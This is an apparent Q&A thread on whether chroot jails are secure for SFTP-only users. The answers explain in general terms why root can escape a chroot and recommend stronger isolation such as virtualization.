I've been playing around with CentOS box for couple of years now. So I'm pretty comfy with terminal. However, I read a lot of blog-post claiming that chroot is insecure and amount of those posts frightens. Is it really so? Why?
I use chroot to lockdown the SFTP-only users in specific context, without any shell or commands at all. So really, what is the security problem with that?
Question is exiled from StackOverflow.
Because, in most instances, a root process can easily exit the chroot. This is by design, as chroot was never intended as a security device.
Alan Cox somewhat famously berated a developer that submitted a kernel patch to "fix" this behavior, claiming that chroot has been abused as a security device, but was never intended to be one.
I know at least one example of why it is considered to be insecure. A chroot environment /proc isn't isolated, so it's fairly easy to access resources not owned by processes started in your chroot.
Using a chrooted enviroment for SFTP is fine and improves the level of security significantly. Just don't abuse it as container-based virtualization, which does provide more levels of security. In this, I underline what's in @MDMarra's answer.
Whenever an adversary gains superuser access within a chroot environment, there are different possibilities to escape from the jail. One is based on the fact that not all file descriptors are closed when calling chroot(). A simple C program could be written that exploits this fact. More restrictive solutions than chroot exist, such as virtualization. However, chroot offers a simple and straightforward way to restrict processes and their abilities.
